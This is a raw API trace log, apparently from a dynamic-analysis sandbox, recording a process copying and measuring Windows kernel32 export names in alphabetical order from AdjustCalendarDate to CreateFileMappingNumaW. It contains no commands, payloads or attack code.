[0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.655] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.655] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.655] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.655] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.655] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.655] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.655] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.655] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.655] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.655] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.655] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.655] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.655] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.655] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.656] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.656] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.656] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.656] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.656] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.656] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.656] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.656] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.656] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.656] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.656] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.656] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.656] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.656] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.656] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.656] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.656] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.656] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.656] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.657] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.657] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.657] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.657] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.657] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.657] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.657] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.657] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.657] lstrlenA (lpString="BEEP") returned 4 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.657] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.657] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.657] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.657] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.657] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.657] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.657] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.657] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.657] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.657] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.657] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.658] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.658] lstrlenA (lpString="CANCELIO") returned 8 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.658] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.658] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.658] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.658] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.658] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.658] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.658] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.658] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.658] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.658] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.658] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.658] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.658] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.658] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.658] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.658] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.658] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.659] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.659] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.659] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.659] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.659] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.659] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.659] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.659] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.659] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.659] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.659] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.659] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.659] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.659] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.659] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.659] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.659] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.659] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.659] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.660] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.660] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.660] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.660] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.660] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.660] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.660] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.660] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.660] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.660] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.660] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.660] lstrlenA (lpString="COPYFILEA") returned 9 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.660] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.660] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.660] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.660] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.660] lstrlenA (lpString="COPYFILEW") returned 9 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.660] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.660] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.661] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.661] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.661] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.661] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.661] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.661] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.661] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.661] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.661] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.661] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.661] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.661] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.661] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.661] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.661] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.661] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.661] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.661] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.661] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.661] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.662] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: 